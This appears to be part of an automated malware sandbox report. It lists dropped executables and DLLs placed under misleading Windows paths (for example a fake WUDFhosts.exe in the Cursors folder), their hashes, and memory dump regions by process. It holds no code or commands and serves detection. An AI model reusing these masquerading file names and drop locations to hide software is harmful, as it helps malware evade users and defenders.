\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
\Windows\Help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Logs\RunDllExe.dll
MD5
c02d9300deea8aaa42bf5e9c56ddcf29

SHA1
4c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89

SHA256
54dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5

SHA512
c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1

Download Submit
memory/296-69-0x0000000000000000-mapping.dmp

Download
memory/296-71-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/436-79-0x0000000000000000-mapping.dmp

Download
memory/472-77-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/472-82-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/472-87-0x00000000004054EC-mapping.dmp

Download
memory/472-121-0x0000000000000000-mapping.dmp

Download
memory/560-80-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/560-91-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/560-86-0x00000000004054EC-mapping.dmp

Download
memory/572-101-0x0000000000000000-mapping.dmp

Download
memory/808-105-0x0000000000000000-mapping.dmp

Download
memory/968-117-0x0000000000000000-mapping.dmp

Download
memory/1064-103-0x0000000000000000-mapping.dmp

Download
memory/1396-109-0x0000000000000000-mapping.dmp

Download
memory/1452-107-0x0000000000000000-mapping.dmp

Download
memory/1460-113-0x0000000000000000-mapping.dmp

Download
memory/1600-98-0x0000000000000000-mapping.dmp

Download
memory/1608-60-0x0000000000000000-mapping.dmp

Download
memory/1624-111-0x0000000000000000-mapping.dmp

Download
memory/1900-129-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1900-128-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1900-130-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1900-131-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1900-133-0x0000000010072B6D-mapping.dmp

Download
memory/1900-135-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1904-115-0x0000000000000000-mapping.dmp

Download
memory/1916-64-0x0000000000000000-mapping.dmp

Download
memory/1928-138-0x0000000000000000-mapping.dmp

Download
memory/1928-140-0x00000000000F0000-0x0000000000100000-memory.dmp

Filesize
64KB

Download
memory/1928-141-0x0000000000130000-0x0000000000140000-memory.dmp

Filesize
64KB

Download
memory/1928-142-0x0000000000140000-0x0000000000150000-memory.dmp

Filesize
64KB

Download
memory/1928-143-0x0000000000150000-0x0000000000160000-memory.dmp

Filesize
64KB

Download
memory/1952-119-0x0000000000000000-mapping.dmp

Download
memory/2016-126-0x0000000000000000-mapping.dmp

Download